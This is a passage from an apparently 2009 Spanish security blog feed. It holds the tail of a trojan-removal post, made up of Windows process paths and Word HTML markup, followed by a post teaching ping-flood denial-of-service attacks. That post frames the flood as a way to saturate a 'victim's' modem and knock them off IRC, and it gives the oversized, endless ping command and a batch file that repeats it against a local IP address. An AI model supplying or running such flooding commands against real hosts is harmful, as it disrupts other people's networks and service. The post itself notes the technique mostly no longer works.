/&gt;C:\WINDOWS\SYSTEM\mmtask.tsk&lt;br /&gt;C:\WINDOWS\EXPLORER.EXE&lt;br /&gt;C:\WINDOWS\TASKMON.EXE&lt;br /&gt;C:\WINDOWS\SYSTEM\SYSTRAY.EXE&lt;br /&gt;C:\WINDOWS\PATCH.EXE&lt;br /&gt;C:\WINDOWS\WINDOW.EXE&lt;br /&gt;C:\WINDOWS\SYSTEM\ .EXE&lt;br /&gt;C:\WINDOWS\SYSTEM\NSSX.EXE&lt;br /&gt;C:\WINDOWS\RNAAPP.EXE&lt;br /&gt;C:\WINDOWS\TAPISVR.EXE&lt;br /&gt;C:\ARCHIVOS DE PROGRAMA\ICQ\ICQ.EXE&lt;br /&gt;C:\ARCHIVOS DE PROGRAMA\OUTLOOK EXPRESS\MSIMN.EXE&lt;br /&gt;C:\ARCHIVOS DE PROGRAMA\MATAPROCESOS\MATAPROCESOS.EXE&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;meta equiv="Content-Type" content="text/html; charset=utf-8"&gt;&lt;meta name="ProgId" content="Word.Document"&gt;&lt;meta name="Generator" content="Microsoft Word 12"&gt;&lt;meta name="Originator" content="Microsoft Word 12"&gt;&lt;link rel="File-List" href="file:///C:%5CDOCUME%7E1%5Candres%5CCONFIG%7E1%5CTemp%5Cmsohtmlclip1%5C01%5Cclip_filelist.xml"&gt;&lt;link rel="themeData" href="file:///C:%5CDOCUME%7E1%5Candres%5CCONFIG%7E1%5CTemp%5Cmsohtmlclip1%5C01%5Cclip_themedata.thmx"&gt;&lt;link rel="colorSchemeMapping" href="file:///C:%5CDOCUME%7E1%5Candres%5CCONFIG%7E1%5CTemp%5Cmsohtmlclip1%5C01%5Cclip_colorschememapping.xml"&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:worddocument&gt;   &lt;w:view&gt;Normal&lt;/w:View&gt;   &lt;w:zoom&gt;0&lt;/w:Zoom&gt;   &lt;w:trackmoves/&gt;   &lt;w:trackformatting/&gt;   &lt;w:hyphenationzone&gt;21&lt;/w:HyphenationZone&gt;   &lt;w:punctuationkerning/&gt;   &lt;w:validateagainstschemas/&gt;   &lt;w:saveifxmlinvalid&gt;false&lt;/w:SaveIfXMLInvalid&gt;   &lt;w:ignoremixedcontent&gt;false&lt;/w:IgnoreMixedContent&gt;   &lt;w:alwaysshowplaceholdertext&gt;false&lt;/w:AlwaysShowPlaceholderText&gt;   &lt;w:donotpromoteqf/&gt;   &lt;w:lidthemeother&gt;ES&lt;/w:LidThemeOther&gt;   &lt;w:lidthemeasian&gt;X-NONE&lt;/w:LidThemeAsian&gt;   &lt;w:lidthemecomplexscript&gt;X-NONE&lt;/w:LidThemeComplexScript&gt;   &lt;w:compatibility&gt;    &lt;w:breakwrappedtables/&gt;    &lt;w:snaptogridincell/&gt;    &lt;w:wraptextwithpunct/&gt;    &lt;w:useasianbreakrules/&gt;    &lt;w:dontgrowautofit/&gt;    &lt;w:splitpgbreakandparamark/&gt;    &lt;w:dontvertaligncellwithsp/&gt;    &lt;w:dontbreakconstrainedforcedtables/&gt;    &lt;w:dontvertalignintxbx/&gt;    &lt;w:word11kerningpairs/&gt;    &lt;w:cachedcolbalance/&gt;   &lt;/w:Compatibility&gt;   &lt;w:browserlevel&gt;MicrosoftInternetExplorer4&lt;/w:BrowserLevel&gt;   &lt;m:mathpr&gt;    &lt;m:mathfont val="Cambria Math"&gt;    &lt;m:brkbin val="before"&gt;    &lt;m:brkbinsub val="--"&gt;    &lt;m:smallfrac val="off"&gt;    &lt;m:dispdef/&gt;    &lt;m:lmargin val="0"&gt;    &lt;m:rmargin val="0"&gt;    &lt;m:defjc val="centerGroup"&gt;    &lt;m:wrapindent val="1440"&gt;    &lt;m:intlim val="subSup"&gt;    &lt;m:narylim val="undOvr"&gt;   &lt;/m:mathPr&gt;&lt;/w:WordDocument&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:latentstyles deflockedstate="false" defunhidewhenused="true" defsemihidden="true" defqformat="false" defpriority="99" latentstylecount="267"&gt;   &lt;w:lsdexception locked="false" priority="0" semihidden="false" unhidewhenused="false" qformat="true" name="Normal"&gt;   &lt;w:lsdexception locked="false" priority="9" semihidden="false" unhidewhenused="false" qformat="true" name="heading 1"&gt;   &lt;w:lsdexception locked="false" priority="9" qformat="true" name="heading 2"&gt;   &lt;w:lsdexception locked="false" priority="9" qformat="true" name="heading 3"&gt;   &lt;w:lsdexception locked="false" priority="9" qformat="true" name="heading 4"&gt;   &lt;w:lsdexception locked="false" priority="9" qformat="true" name="heading 5"&gt;   &lt;w:lsdexception locked="false" priority="9" qformat="true" name="heading 6"&gt;   &lt;w:lsdexception locked="false" priority="9" qformat="true" name="heading 7"&gt;   &lt;w:lsdexception locked="false" priority="9" qformat="true" name="heading 8"&gt;   &lt;w:lsdexception locked="false" priority="9" qformat="true" name="heading 9"&gt;   &lt;w:lsdexception locked="false" priority="39" name="toc 1"&gt;   &lt;w:lsdexception locked="false" priority="39" name="toc 2"&gt;   &lt;w:lsdexception locked="false" priority="39" name="toc 3"&gt;   &lt;w:lsdexception locked="false" priority="39" name="toc 4"&gt;   &lt;w:lsdexception locked="false" priority="39" name="toc 5"&gt;   &lt;w:lsdexception locked="false" priority="39" name="toc 6"&gt;   &lt;w:lsdexception locked="false" priority="39" name="toc 7"&gt;   &lt;w:lsdexception locked="false" priority="39" name="toc 8"&gt;   &lt;w:lsdexception locked="false" priority="39" name="toc 9"&gt;   &lt;w:lsdexception locked="false" priority="35" qformat="true" name="caption"&gt;   &lt;w:lsdexception locked="false" priority="10" semihidden="false" unhidewhenused="false" qformat="true" name="Title"&gt;   &lt;w:lsdexception locked="false" priority="1" name="Default Paragraph Font"&gt;   &lt;w:lsdexception locked="false" priority="11" semihidden="false" unhidewhenused="false" qformat="true" name="Subtitle"&gt;   &lt;w:lsdexception locked="false" priority="0" name="Hyperlink"&gt;   &lt;w:lsdexception locked="false" priority="22" semihidden="false" unhidewhenused="false" qformat="true" name="Strong"&gt;   &lt;w:lsdexception locked="false" priority="20" semihidden="false" unhidewhenused="false" qformat="true" name="Emphasis"&gt;   &lt;w:lsdexception locked="false" priority="0" name="Normal (Web)"&gt;   &lt;w:lsdexception locked="false" priority="59" semihidden="false" unhidewhenused="false" name="Table Grid"&gt;   &lt;w:lsdexception locked="false" unhidewhenused="false" name="Placeholder Text"&gt;   &lt;w:lsdexception locked="false" priority="1" semihidden="false" unhidewhenused="false" qformat="true" name="No Spacing"&gt;   &lt;w:lsdexception locked="false" priority="60" semihidden="false" unhidewhenused="false" name="Light Shading"&gt;   &lt;w:lsdexception locked="false" priority="61" semihidden="false" unhidewhenused="false" name="Light List"&gt;   &lt;w:lsdexception locked="false" priority="62" semihidden="false" unhidewhenused="false" name="Light Grid"&gt;   &lt;w:lsdexception locked="false" priority="63" semihidden="false" unhidewhenused="false" name="Medium Shading 1"&gt;   &lt;w:lsdexception locked="false" priority="64" semihidden="false" unhidewhenused="false" name="Medium Shading 2"&gt;   &lt;w:lsdexception locked="false" priority="65" semihidden="false" unhidewhenused="false" name="Medium List 1"&gt;   &lt;w:lsdexception locked="false" priority="66" semihidden="false" unhidewhenused="false" name="Medium List 2"&gt;   &lt;w:lsdexception locked="false" priority="67" semihidden="false" unhidewhenused="false" name="Medium Grid 1"&gt;   &lt;w:lsdexception locked="false" priority="68" semihidden="false" unhidewhenused="false" name="Medium Grid 2"&gt;   &lt;w:lsdexception locked="false" priority="69" semihidden="false" unhidewhenused="false" name="Medium Grid 3"&gt;   &lt;w:lsdexception locked="false" priority="70" semihidden="false" unhidewhenused="false" name="Dark List"&gt;   &lt;w:lsdexception locked="false" priority="71" semihidden="false" unhidewhenused="false" name="Colorful Shading"&gt;   &lt;w:lsdexception locked="false" priority="72" semihidden="false" unhidewhenused="false" name="Colorful List"&gt;   &lt;w:lsdexception locked="false" priority="73" semihidden="false" unhidewhenused="false" name="Colorful Grid"&gt;   &lt;w:lsdexception locked="false" priority="60" semihidden="false" unhidewhenused="false" name="Light Shading Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="61" semihidden="false" unhidewhenused="false" name="Light List Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="62" semihidden="false" unhidewhenused="false" name="Light Grid Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="63" semihidden="false" unhidewhenused="false" name="Medium Shading 1 Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="64" semihidden="false" unhidewhenused="false" name="Medium Shading 2 Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="65" semihidden="false" unhidewhenused="false" name="Medium List 1 Accent 1"&gt;   &lt;w:lsdexception locked="false" unhidewhenused="false" name="Revision"&gt;   &lt;w:lsdexception locked="false" priority="34" semihidden="false" unhidewhenused="false" qformat="true" name="List Paragraph"&gt;   &lt;w:lsdexception locked="false" priority="29" semihidden="false" unhidewhenused="false" qformat="true" name="Quote"&gt;   &lt;w:lsdexception locked="false" priority="30" semihidden="false" unhidewhenused="false" qformat="true" name="Intense Quote"&gt;   &lt;w:lsdexception locked="false" priority="66" semihidden="false" unhidewhenused="false" name="Medium List 2 Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="67" semihidden="false" unhidewhenused="false" name="Medium Grid 1 Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="68" semihidden="false" unhidewhenused="false" name="Medium Grid 2 Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="69" semihidden="false" unhidewhenused="false" name="Medium Grid 3 Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="70" semihidden="false" unhidewhenused="false" name="Dark List Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="71" semihidden="false" unhidewhenused="false" name="Colorful Shading Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="72" semihidden="false" unhidewhenused="false" name="Colorful List Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="73" semihidden="false" unhidewhenused="false" name="Colorful Grid Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="60" semihidden="false" unhidewhenused="false" name="Light Shading Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="61" semihidden="false" unhidewhenused="false" name="Light List Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="62" semihidden="false" unhidewhenused="false" name="Light Grid Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="63" semihidden="false" unhidewhenused="false" name="Medium Shading 1 Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="64" semihidden="false" unhidewhenused="false" name="Medium Shading 2 Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="65" semihidden="false" unhidewhenused="false" name="Medium List 1 Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="66" semihidden="false" unhidewhenused="false" name="Medium List 2 Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="67" semihidden="false" unhidewhenused="false" name="Medium Grid 1 Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="68" semihidden="false" unhidewhenused="false" name="Medium Grid 2 Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="69" semihidden="false" unhidewhenused="false" name="Medium Grid 3 Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="70" semihidden="false" unhidewhenused="false" name="Dark List Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="71" semihidden="false" unhidewhenused="false" name="Colorful Shading Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="72" semihidden="false" unhidewhenused="false" name="Colorful List Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="73" semihidden="false" unhidewhenused="false" name="Colorful Grid Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="60" semihidden="false" unhidewhenused="false" name="Light Shading Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="61" semihidden="false" unhidewhenused="false" name="Light List Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="62" semihidden="false" unhidewhenused="false" name="Light Grid Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="63" semihidden="false" unhidewhenused="false" name="Medium Shading 1 Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="64" semihidden="false" unhidewhenused="false" name="Medium Shading 2 Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="65" semihidden="false" unhidewhenused="false" name="Medium List 1 Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="66" semihidden="false" unhidewhenused="false" name="Medium List 2 Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="67" semihidden="false" unhidewhenused="false" name="Medium Grid 1 Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="68" semihidden="false" unhidewhenused="false" name="Medium Grid 2 Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="69" semihidden="false" unhidewhenused="false" name="Medium Grid 3 Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="70" semihidden="false" unhidewhenused="false" name="Dark List Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="71" semihidden="false" unhidewhenused="false" name="Colorful Shading Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="72" semihidden="false" unhidewhenused="false" name="Colorful List Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="73" semihidden="false" unhidewhenused="false" name="Colorful Grid Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="60" semihidden="false" unhidewhenused="false" name="Light Shading Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="61" semihidden="false" unhidewhenused="false" name="Light List Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="62" semihidden="false" unhidewhenused="false" name="Light Grid Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="63" semihidden="false" unhidewhenused="false" name="Medium Shading 1 Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="64" semihidden="false" unhidewhenused="false" name="Medium Shading 2 Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="65" semihidden="false" unhidewhenused="false" name="Medium List 1 Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="66" semihidden="false" unhidewhenused="false" name="Medium List 2 Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="67" semihidden="false" unhidewhenused="false" name="Medium Grid 1 Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="68" semihidden="false" unhidewhenused="false" name="Medium Grid 2 Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="69" semihidden="false" unhidewhenused="false" name="Medium Grid 3 Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="70" semihidden="false" unhidewhenused="false" name="Dark List Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="71" semihidden="false" unhidewhenused="false" name="Colorful Shading Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="72" semihidden="false" unhidewhenused="false" name="Colorful List Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="73" semihidden="false" unhidewhenused="false" name="Colorful Grid Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="60" semihidden="false" unhidewhenused="false" name="Light Shading Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="61" semihidden="false" unhidewhenused="false" name="Light List Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="62" semihidden="false" unhidewhenused="false" name="Light Grid Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="63" semihidden="false" unhidewhenused="false" name="Medium Shading 1 Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="64" semihidden="false" unhidewhenused="false" name="Medium Shading 2 Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="65" semihidden="false" unhidewhenused="false" name="Medium List 1 Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="66" semihidden="false" unhidewhenused="false" name="Medium List 2 Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="67" semihidden="false" unhidewhenused="false" name="Medium Grid 1 Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="68" semihidden="false" unhidewhenused="false" name="Medium Grid 2 Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="69" semihidden="false" unhidewhenused="false" name="Medium Grid 3 Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="70" semihidden="false" unhidewhenused="false" name="Dark List Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="71" semihidden="false" unhidewhenused="false" name="Colorful Shading Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="72" semihidden="false" unhidewhenused="false" name="Colorful List Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="73" semihidden="false" unhidewhenused="false" name="Colorful Grid Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="60" semihidden="false" unhidewhenused="false" name="Light Shading Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="61" semihidden="false" unhidewhenused="false" name="Light List Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="62" semihidden="false" unhidewhenused="false" name="Light Grid Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="63" semihidden="false" unhidewhenused="false" name="Medium Shading 1 Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="64" semihidden="false" unhidewhenused="false" name="Medium Shading 2 Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="65" semihidden="false" unhidewhenused="false" name="Medium List 1 Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="66" semihidden="false" unhidewhenused="false" name="Medium List 2 Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="67" semihidden="false" unhidewhenused="false" name="Medium Grid 1 Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="68" semihidden="false" unhidewhenused="false" name="Medium Grid 2 Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="69" semihidden="false" unhidewhenused="false" name="Medium Grid 3 Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="70" semihidden="false" unhidewhenused="false" name="Dark List Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="71" semihidden="false" unhidewhenused="false" name="Colorful Shading Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="72" semihidden="false" unhidewhenused="false" name="Colorful List Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="73" semihidden="false" unhidewhenused="false" name="Colorful Grid Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="19" semihidden="false" unhidewhenused="false" qformat="true" name="Subtle Emphasis"&gt;   &lt;w:lsdexception locked="false" priority="21" semihidden="false" unhidewhenused="false" qformat="true" name="Intense Emphasis"&gt;   &lt;w:lsdexception locked="false" priority="31" semihidden="false" unhidewhenused="false" qformat="true" name="Subtle Reference"&gt;   &lt;w:lsdexception locked="false" priority="32" semihidden="false" unhidewhenused="false" qformat="true" name="Intense Reference"&gt;   &lt;w:lsdexception locked="false" priority="33" semihidden="false" unhidewhenused="false" qformat="true" name="Book Title"&gt;   &lt;w:lsdexception locked="false" priority="37" name="Bibliography"&gt;   &lt;w:lsdexception locked="false" priority="39" qformat="true" name="TOC Heading"&gt;  &lt;/w:LatentStyles&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;style&gt; &lt;!--  /* Font Definitions */  @font-face 	{font-family:"Cambria Math"; 	panose-1:2 4 5 3 5 4 6 3 2 4; 	mso-font-charset:1; 	mso-generic-font-family:roman; 	mso-font-format:other; 	mso-font-pitch:variable; 	mso-font-signature:0 0 0 0 0 0;}  /* Style Definitions */  p.MsoNormal, li.MsoNormal, div.MsoNormal 	{mso-style-unhide:no; 	mso-style-qformat:yes; 	mso-style-parent:""; 	margin:0cm; 	margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman","serif"; 	mso-fareast-font-family:"Times New Roman";} p 	{mso-style-noshow:yes; 	mso-style-unhide:no; 	mso-margin-top-alt:auto; 	margin-right:0cm; 	mso-margin-bottom-alt:auto; 	margin-left:0cm; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman","serif"; 	mso-fareast-font-family:"Times New Roman";} .MsoChpDefault 	{mso-style-type:export-only; 	mso-default-props:yes; 	font-size:10.0pt; 	mso-ansi-font-size:10.0pt; 	mso-bidi-font-size:10.0pt;} @page Section1 	{size:612.0pt 792.0pt; 	margin:70.85pt 3.0cm 70.85pt 3.0cm; 	mso-header-margin:36.0pt; 	mso-footer-margin:36.0pt; 	mso-paper-source:0;} div.Section1 	{page:Section1;} --&gt; &lt;/style&gt;&lt;!--[if gte mso 10]&gt; &lt;style&gt;  /* Style Definitions */  table.MsoNormalTable 	{mso-style-name:"Tabla normal"; 	mso-tstyle-rowband-size:0; 	mso-tstyle-colband-size:0; 	mso-style-noshow:yes; 	mso-style-priority:99; 	mso-style-qformat:yes; 	mso-style-parent:""; 	mso-padding-alt:0cm 5.4pt 0cm 5.4pt; 	mso-para-margin:0cm; 	mso-para-margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:11.0pt; 	font-family:"Calibri","sans-serif"; 	mso-ascii-font-family:Calibri; 	mso-ascii-theme-font:minor-latin; 	mso-fareast-font-family:"Times New Roman"; 	mso-fareast-theme-font:minor-fareast; 	mso-hansi-font-family:Calibri; 	mso-hansi-theme-font:minor-latin; 	mso-bidi-font-family:"Times New Roman"; 	mso-bidi-theme-font:minor-bidi;} &lt;/style&gt; &lt;![endif]--&gt;  &lt;/p&gt;&lt;p&gt;&lt;span style="font-size: 10pt; font-family: &amp;quot;Arial&amp;quot;,&amp;quot;sans-serif&amp;quot;;"&gt;En este caso nos encontramos con un ordenador LLENO DE TROYANOS, es decir, su seguridad ha sido totalmente violada. ¿Cómo nos damos cuenta de eso?&lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style="font-size: 10pt; font-family: &amp;quot;Arial&amp;quot;,&amp;quot;sans-serif&amp;quot;;"&gt;Hace falta estar acostumbrado al MataProcesos, en otras palabras, saber el proceso que cada archivo está ejecutando.&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style="font-size: 10pt; font-family: &amp;quot;Arial&amp;quot;,&amp;quot;sans-serif&amp;quot;;"&gt;Fin de la primera parte.&lt;br /&gt;&lt;/span&gt;&lt;/p&gt; &lt;br /&gt;&lt;span style="font-size: 10pt; font-family: &amp;quot;Arial&amp;quot;,&amp;quot;sans-serif&amp;quot;; color: rgb(0, 102, 153);"&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;span style="font-size: 10pt; font-family: &amp;quot;Arial&amp;quot;,&amp;quot;sans-serif&amp;quot;; color: rgb(0, 102, 153);"&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style="font-size: 10pt; font-family: &amp;quot;Arial&amp;quot;,&amp;quot;sans-serif&amp;quot;; color: rgb(0, 102, 153);"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt; &lt;br /&gt;&lt;span style="font-size: 10pt; font-family: &amp;quot;Arial&amp;quot;,&amp;quot;sans-serif&amp;quot;;"&gt;&lt;/span&gt;&lt;b&gt;&lt;span style="font-size: 10pt; font-family: &amp;quot;Arial&amp;quot;,&amp;quot;sans-serif&amp;quot;;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;p&gt;&lt;/p&gt;  &lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6882397234957178715-5157129520791935872?l=vigilantedelared.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://vigilantedelared.blogspot.com/feeds/5157129520791935872/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://vigilantedelared.blogspot.com/2009/09/como-librarse-de-un-troyanoprimera.html#comment-form' title='1 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/5157129520791935872'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/5157129520791935872'/><link rel='alternate' type='text/html' href='http://vigilantedelared.blogspot.com/2009/09/como-librarse-de-un-troyanoprimera.html' title='Como librarse de un troyano?(primera parte)'/><author><name>Cibercentinela</name><uri>http://www.blogger.com/profile/00237087687003170157</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_mFMUaCwtbag/SqPYBSbyulI/AAAAAAAAAAM/SxEt7BdJRRo/S220/calavera-pirata.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6882397234957178715.post-5512677820085712612</id><published>2009-09-17T16:58:00.000+02:00</published><updated>2009-09-17T17:10:47.100+02:00</updated><title type='text'>Ataques D.o.S a base de pings</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_mFMUaCwtbag/SrJQb04D0xI/AAAAAAAAABQ/3wVZfVM8iL0/s1600-h/cmddh6.png"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 320px; height: 162px;" src="http://3.bp.blogspot.com/_mFMUaCwtbag/SrJQb04D0xI/AAAAAAAAABQ/3wVZfVM8iL0/s320/cmddh6.png" alt="" id="BLOGGER_PHOTO_ID_5382452943641629458" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Bueno en est post pondre lo que es un ataque a D.O.S(de las siglas en inglés &lt;i&gt;Denial of Service&lt;/i&gt;)&lt;br /&gt;&lt;div style="text-align: left;"&gt;En seguridad informática, un&lt;span style="font-family:arial;"&gt; &lt;/span&gt;&lt;b style="font-family: arial;"&gt;ataque de denegación de servicio&lt;/b&gt;, también llamado &lt;b&gt;ataque DoS&lt;/b&gt;,esta claro que lo dejo a su responsabilidad hacerlo.Esto fue lo que durante un tiempo dejo de&lt;br /&gt;funcionar twitter.&lt;br /&gt;Bien, hoy vamos a aprender, a como saturar un modem, a base de pings.&lt;br /&gt;Vamos al tema.&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);" class="bbc_color"&gt;Una aclaración antes de todo, esto ya no funciona en el 80% de los casos, pero he pensado que por saber mas o menos como se realiza un ataque D.o.S, que no falte.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Un ping es un tipo de mensaje ICMP, que se usa para ver si una máquina se encuentra operativa y accesible.&lt;br /&gt;El procedimiento es enviarle un ping a la máquina; ésta lo recibe y contesta. Al recibir la contestación ya sabemos que la máquina vive. Si no se recibe en un plazo dado se considera como no accesible (la máquina podría estar apagada, o todos los "caminos" en la red hacia ella cortados).&lt;br /&gt;La manera de usar esto de forma ofensiva consiste en mandar más pings a un usuario de los que su máquina pueda contestar, saturándole su conexión a Internet.&lt;br /&gt;&lt;br /&gt;Los paquetes que se envían al hacer ping son típicamente muy pequeños. Con el modificador -s estamos forzando un nuevo tamaño (32000 bytes es aceptable; también podés probar con 64000).&lt;br /&gt;Pensad: un modem de 28.8 tardará unos 18 segs. en recibir 64 Kbytes (sin considerar compresión), mientras que desde nuestra shell lo hemos mandado en ¡¡décimas de segundo!! Si consideramos además que el comando ping manda más de un paquete (los que queramos) ... ¡boom! Tendréis el módem de vuestra víctima trabajando a toda pastilla para nada y fastidiándole todo lo que esté haciendo. En particular, le estropearéis su conexión al IRC: en el mejor de los casos la víctima tendrá un lag horroroso y en el peor será expulsada del servidor por "ping time-out".&lt;br /&gt;Desgraciadamente la solución para evitar este ataque no suele ser fácil ya que no se trata de un bug que se pueda parchear sino de la propia mecánica de los protocolos TCP/IP. Lo único que se puede hacer es rogar que nuestra máquina sea más potente que la de nuestro enemigo.&lt;br /&gt;&lt;br /&gt;&lt;span class="bbc_color"  style="color:red;"&gt;Manos a la masa&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;La sintaxis es:&lt;br /&gt;&lt;br /&gt;ping -l 64000 "IP o HOST" -t&lt;br /&gt;&lt;br /&gt;-l 64000 significa el tamaño del paquete y -t es para que mande paquetes infinitos hasta saturar el servidor.&lt;br /&gt;&lt;br /&gt;Para comprobar que está surtiendo efecto, solo hace falta hacer un ping normal, a esa misma ip o host.&lt;br /&gt;Si no la devuelve, quiere decir que está saturada devolviendo grandiosos paquetes.&lt;br /&gt;&lt;br /&gt;Para ser más eficaz, y no teclear constantemente esa sintáxis, podemos crear un batch:&lt;br /&gt;En mi caso, la sintaxis sería&lt;br /&gt;&lt;br /&gt;@echo off&lt;br /&gt;ping -l 64000 192.168.1.5 -t&lt;br /&gt;echo&lt;br /&gt;&lt;br /&gt;Fuente:http://foro.eduhack.es/hacking-avanzado/tutorial-ataques-d-o-s-a-base-de-pings/&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6882397234957178715-5512677820085712612?l=vigilantedelared.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://vigilantedelared.blogspot.com/feeds/5512677820085712612/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://vigilantedelared.blogspot.com/2009/09/ataques-dos-base-de-pings.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/5512677820085712612'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/5512677820085712612'/><link rel='alternate' type='text/html' href='http://vigilantedelared.blogspot.com/2009/09/ataques-dos-base-de-pings.html' title='Ataques D.o.S a base de pings'/><author><name>Cibercentinela</name><uri>http://www.blogger.com/profile/00237087687003170157</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' 